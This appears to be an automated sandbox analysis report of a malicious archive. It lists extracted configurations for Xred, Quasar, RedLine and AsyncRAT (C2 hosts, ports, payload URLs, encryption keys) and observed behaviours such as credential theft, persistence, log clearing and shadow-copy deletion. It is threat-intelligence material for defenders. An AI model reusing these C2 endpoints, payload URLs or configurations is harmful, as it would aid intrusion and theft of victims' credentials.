Analysis
-
max time kernel
159s -
max time network
426s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-01-2025 17:32
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
redline
1V
195.177.92.88:1912
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt
Signatures
-
Asyncrat family
-
Meduza Stealer payload 5 IoCs
resource yara_rule behavioral1/memory/1476-306-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral1/memory/1476-304-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral1/memory/1476-302-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral1/memory/1476-311-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral1/memory/1476-309-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
description flow ioc Process 192 api.ipify.org Process not Found 197 ip-api.com Process not Found Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\14.0\Common 7zFM.exe 37 api.ipify.org Process not Found 38 api.ipify.org Process not Found 153 ip-api.com Process not Found -
Quasar family
-
Quasar payload 4 IoCs
resource yara_rule behavioral1/files/0x000d000000019650-197.dat family_quasar behavioral1/memory/2384-199-0x0000000000170000-0x0000000000494000-memory.dmp family_quasar behavioral1/memory/2608-212-0x0000000001260000-0x0000000001584000-memory.dmp family_quasar behavioral1/memory/2316-2081-0x0000000001020000-0x000000000107E000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/files/0x00090000000197e4-204.dat family_redline behavioral1/memory/2760-206-0x0000000000D20000-0x0000000000D72000-memory.dmp family_redline behavioral1/memory/4456-2069-0x0000000000CD0000-0x0000000000D22000-memory.dmp family_redline -
Redline family
-
Xred family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 4656 powershell.EXE 1520 powershell.exe 4924 powershell.exe 1364 powershell.exe 2768 powershell.exe 1612 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GeekBrains\ImagePath = "C:\\ProgramData\\Screenshots\\Lightshot.exe" services.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation gem1.exe -
Executes dropped EXE 15 IoCs
pid Process 2636 New Text Document mod.exe 636 ._cache_New Text Document mod.exe 336 Synaptics.exe 2888 ._cache_Synaptics.exe 2384 voidware_loader.exe 2760 build.exe 2608 DirectX111.exe 580 gem2.exe 2688 New Text Document mod.exe 1376 ._cache_New Text Document mod.exe 964 gem1.exe 1476 gem1.exe 4868 Lightshot.exe 4864 New Text Document mod.exe 4804 ._cache_New Text Document mod.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 49 IoCs
pid Process 2636 New Text Document mod.exe 2636 New Text Document mod.exe 2636 New Text Document mod.exe 2636 New Text Document mod.exe 336 Synaptics.exe 336 Synaptics.exe 336 Synaptics.exe 2888 ._cache_Synaptics.exe 2888 ._cache_Synaptics.exe 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 2688 New Text Document mod.exe 1192 Explorer.EXE 2688 New Text Document mod.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 292 WerFault.exe 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 472 services.exe 472 services.exe 4864 New Text Document mod.exe 4864 New Text Document mod.exe 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE 1192 Explorer.EXE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 215 0.tcp.in.ngrok.io 21 raw.githubusercontent.com 22 raw.githubusercontent.com 120 0.tcp.in.ngrok.io 142 0.tcp.in.ngrok.io 111 raw.githubusercontent.com 155 raw.githubusercontent.com 175 raw.githubusercontent.com 277 0.tcp.in.ngrok.io -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 192 api.ipify.org 197 ip-api.com 37 api.ipify.org 38 api.ipify.org 153 ip-api.com -
Power Settings 1 TTPs 16 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2436 powercfg.exe 3804 powercfg.exe 1520 powercfg.exe 2432 powercfg.exe 1152 powercfg.exe 2200 powercfg.exe 2640 powercfg.exe 4544 powercfg.exe 3808 powercfg.exe 4316 powercfg.exe 3820 powercfg.exe 2336 powercfg.exe 4104 powercfg.exe 688 powercfg.exe 2736 powercfg.exe 3788 powercfg.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe File opened for modification C:\Windows\system32\wbem\Logs\wmiprov.log wmiprvse.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe gem2.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 964 set thread context of 1476 964 gem1.exe 55 PID 580 set thread context of 2760 580 gem2.exe 93 PID 4868 set thread context of 3836 4868 Lightshot.exe 124 PID 4868 set thread context of 3948 4868 Lightshot.exe 126 PID 4868 set thread context of 3668 4868 Lightshot.exe 130 -
resource yara_rule behavioral1/files/0x0008000000005b4a-1426.dat upx behavioral1/memory/636-1415-0x000000013F230000-0x000000013F247000-memory.dmp upx behavioral1/memory/912-1430-0x000000013F230000-0x000000013F247000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2512 sc.exe 2256 sc.exe 2768 sc.exe 1484 sc.exe 2060 sc.exe 4716 sc.exe 4888 sc.exe 4388 sc.exe 3044 sc.exe 3228 sc.exe 3376 sc.exe 4608 sc.exe 4724 sc.exe 5116 sc.exe 1920 sc.exe 2340 sc.exe 2324 sc.exe 2320 sc.exe 3348 sc.exe 3536 sc.exe 4328 sc.exe 3696 sc.exe 3576 sc.exe 4676 sc.exe 2568 sc.exe 3088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 292 964 WerFault.exe 53 2228 3824 WerFault.exe 182 4696 2564 WerFault.exe 209 4808 3604 WerFault.exe 213 2440 5060 WerFault.exe 219 3276 4484 WerFault.exe 223 1452 2800 WerFault.exe 198 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4464 cmd.exe 4324 PING.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90aa9655e165db01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4324 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2724 schtasks.exe 2068 schtasks.exe 4792 schtasks.exe 1692 schtasks.exe 4316 SCHTASKS.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2760 build.exe 2760 build.exe 2760 build.exe 1476 gem1.exe 1220 chrome.exe 1220 chrome.exe 580 gem2.exe 1520 powershell.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 580 gem2.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 580 gem2.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 580 gem2.exe 580 gem2.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 4868 Lightshot.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 4924 powershell.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe 2760 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2716 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2716 7zFM.exe Token: 35 2716 7zFM.exe Token: SeSecurityPrivilege 2716 7zFM.exe Token: SeDebugPrivilege 636 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 2888 ._cache_Synaptics.exe Token: SeDebugPrivilege 2384 voidware_loader.exe Token: SeDebugPrivilege 2608 DirectX111.exe Token: SeDebugPrivilege 2760 build.exe Token: SeDebugPrivilege 1376 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 1476 gem1.exe Token: SeImpersonatePrivilege 1476 gem1.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 2432 powercfg.exe Token: SeDebugPrivilege 2760 dialer.exe Token: SeShutdownPrivilege 1520 powercfg.exe Token: SeShutdownPrivilege 2436 powercfg.exe Token: SeShutdownPrivilege 2736 powercfg.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeAuditPrivilege 840 svchost.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeShutdownPrivilege 1192 Explorer.EXE Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeAuditPrivilege 840 svchost.exe Token: SeDebugPrivilege 3836 dialer.exe Token: SeShutdownPrivilege 3788 powercfg.exe Token: SeShutdownPrivilege 3820 powercfg.exe Token: SeShutdownPrivilege 3808 powercfg.exe Token: SeShutdownPrivilege 3804 powercfg.exe Token: SeLockMemoryPrivilege 3668 dialer.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeShutdownPrivilege 1220 chrome.exe Token: SeAuditPrivilege 840 svchost.exe Token: SeAuditPrivilege 840 svchost.exe Token: SeAssignPrimaryTokenPrivilege 840 svchost.exe Token: SeIncreaseQuotaPrivilege 840 svchost.exe Token: SeSecurityPrivilege 840 svchost.exe Token: SeTakeOwnershipPrivilege 840 svchost.exe Token: SeLoadDriverPrivilege 840 svchost.exe Token: SeSystemtimePrivilege 840 svchost.exe Token: SeBackupPrivilege 840 svchost.exe Token: SeRestorePrivilege 840 svchost.exe Token: SeShutdownPrivilege 840 svchost.exe Token: SeSystemEnvironmentPrivilege 840 svchost.exe Token: SeUndockPrivilege 840 svchost.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 2716 7zFM.exe 2716 7zFM.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe 1220 chrome.exe -
Suspicious use of UnmapMainImage 9 IoCs
pid Process 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe 600 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2636 wrote to memory of 636 2636 New Text Document mod.exe 33 PID 2636 wrote to memory of 636 2636 New Text Document mod.exe 33 PID 2636 wrote to memory of 636 2636 New Text Document mod.exe 33 PID 2636 wrote to memory of 636 2636 New Text Document mod.exe 33 PID 2636 wrote to memory of 336 2636 New Text Document mod.exe 35 PID 2636 wrote to memory of 336 2636 New Text Document mod.exe 35 PID 2636 wrote to memory of 336 2636 New Text Document mod.exe 35 PID 2636 wrote to memory of 336 2636 New Text Document mod.exe 35 PID 336 wrote to memory of 2888 336 Synaptics.exe 36 PID 336 wrote to memory of 2888 336 Synaptics.exe 36 PID 336 wrote to memory of 2888 336 Synaptics.exe 36 PID 336 wrote to memory of 2888 336 Synaptics.exe 36 PID 636 wrote to memory of 2384 636 ._cache_New Text Document mod.exe 39 PID 636 wrote to memory of 2384 636 ._cache_New Text Document mod.exe 39 PID 636 wrote to memory of 2384 636 ._cache_New Text Document mod.exe 39 PID 2888 wrote to memory of 2760 2888 ._cache_Synaptics.exe 40 PID 2888 wrote to memory of 2760 2888 ._cache_Synaptics.exe 40 PID 2888 wrote to memory of 2760 2888 ._cache_Synaptics.exe 40 PID 2888 wrote to memory of 2760 2888 ._cache_Synaptics.exe 40 PID 2384 wrote to memory of 2724 2384 voidware_loader.exe 42 PID 2384 wrote to memory of 2724 2384 voidware_loader.exe 42 PID 2384 wrote to memory of 2724 2384 voidware_loader.exe 42 PID 2384 wrote to memory of 2608 2384 voidware_loader.exe 44 PID 2384 wrote to memory of 2608 2384 voidware_loader.exe 44 PID 2384 wrote to memory of 2608 2384 voidware_loader.exe 44 PID 2608 wrote to memory of 2068 2608 DirectX111.exe 45 PID 2608 wrote to memory of 2068 2608 DirectX111.exe 45 PID 2608 wrote to memory of 2068 2608 DirectX111.exe 45 PID 2888 wrote to memory of 580 2888 ._cache_Synaptics.exe 47 PID 2888 wrote to memory of 580 2888 ._cache_Synaptics.exe 47 PID 2888 wrote to memory of 580 2888 ._cache_Synaptics.exe 47 PID 2688 wrote to memory of 1376 2688 New Text Document mod.exe 51 PID 2688 wrote to memory of 1376 2688 New Text Document mod.exe 51 PID 2688 wrote to memory of 1376 2688 New Text Document mod.exe 51 PID 2688 wrote to memory of 1376 2688 New Text Document mod.exe 51 PID 2888 wrote to memory of 964 2888 ._cache_Synaptics.exe 53 PID 2888 wrote to memory of 964 2888 ._cache_Synaptics.exe 53 PID 2888 wrote to memory of 964 2888 ._cache_Synaptics.exe 53 PID 2888 wrote to memory of 964 2888 ._cache_Synaptics.exe 53 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 1476 964 gem1.exe 55 PID 964 wrote to memory of 292 964 gem1.exe 56 PID 964 wrote to memory of 292 964 gem1.exe 56 PID 964 wrote to memory of 292 964 gem1.exe 56 PID 964 wrote to memory of 292 964 gem1.exe 56 PID 1220 wrote to memory of 2356 1220 chrome.exe 59 PID 1220 wrote to memory of 2356 1220 chrome.exe 59 PID 1220 wrote to memory of 2356 1220 chrome.exe 59 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 PID 1220 wrote to memory of 2764 1220 chrome.exe 60 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{999c1eac-dc8b-4974-83fe-83f50764bb07}2⤵PID:3296
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:472 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
- Suspicious use of UnmapMainImage
PID:600 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵
- Drops file in System32 directory
PID:1240
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1440
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:2540
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:1888
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:4964
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:3776
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:292
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:4128
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:3252
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:3596
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:4560
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}3⤵PID:3804
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
